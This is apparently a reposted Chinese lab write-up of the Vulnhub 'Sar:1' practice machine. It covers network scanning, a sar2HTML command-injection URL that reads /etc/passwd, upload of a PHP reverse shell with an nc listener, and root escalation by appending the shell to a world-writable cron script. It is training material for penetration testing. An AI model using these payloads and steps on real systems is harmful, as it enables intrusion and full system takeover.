OSCP难度靶机之Sar:1

admin 2025年2月24日09:21:43评论15 views字数 1194阅读3分58秒阅读模式

虚拟机信息:

虚拟机下载地址:https://www.vulnhub.com/entry/sar-1,425/

虚拟机简介:Sar是一种类似于OSCP的VM,旨在在渗透测试领域积累经验

目标:1个flag

级别:简单/中级

1、使用arp-scan进行扫描探测IP地址

arp-scan -l

OSCP难度靶机之Sar:1

2、通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.56.105

查看开放80端口

OSCP难度靶机之Sar:1

3、WEB渗透测试

3.1 使用dirb进行目录扫描发现robots.txt文件

OSCP难度靶机之Sar:1

提示页面为sar2HTML

OSCP难度靶机之Sar:1

3.2 网站页面访问,查看有远程命令执行漏洞

OSCP难度靶机之Sar:1

参考链接:https://www.anquanke.com/vul/id/1688711

OSCP难度靶机之Sar:1

3.3 访问WEB页面后,并选择select host,显示执行结果

http://192.168.56.105/sar2HTML/index.php?plot=;%20tail%20%22/etc/passwd%22

OSCP难度靶机之Sar:1

可以直接上传webshell,并且没有做任何过滤

点击新建,并上传webshell

OSCP难度靶机之Sar:1

3.4 访问webshell默认地址上传地址,并获取到反弹shell

http://192.168.56.105/sar2HTML/sarDATA/uPLOAD/php-reverse-shell.php

OSCP难度靶机之Sar:1

3.5 查看当前用户无sudo权限,查看定时任务

sudo -l
cat /etc/crontab

OSCP难度靶机之Sar:1

3.6 查看用户桌面下的user.txt获取到用户的flag

cd /home/love/Desktop
cat user.txt

OSCP难度靶机之Sar:1

4、系统提权

4.1 查看定时脚本的任务,finally.sh调用write.sh脚本,write.sh脚本创建临时文件,并权限为777

cd /var/www/html/
ls -lah
cat finally.sh
cat write.sh

OSCP难度靶机之Sar:1

4.2 执行php反弹shell连接

kali开启NC反弹监听

nc -nlvp 5555

OSCP难度靶机之Sar:1

复制上传好的webshell,并修改监听端口为5555,并把phpshell写入到定时任务中

cp /var/www/html/sar2HTML/sarDATA/uPLOAD/php-reverse-shell.php /var/www/html/sar2HTML/sarDATA/uPLOAD/shell.php
sed -i s'/port = 4444/port = 5555/' /var/www/html/sar2HTML/sarDATA/uPLOAD/shell.php
echo "php /var/www/html/sar2HTML/sarDATA/uPLOAD/shell.php" >> write.sh

OSCP难度靶机之Sar:1

4.3 获取webshell查看flag信息

等待5分钟后,获取反弹shell连接

cat /root/root.txt

OSCP难度靶机之Sar:1

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Sar:1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月24日09:21:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之Sar:1http://cn-sec.com/archives/863859.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息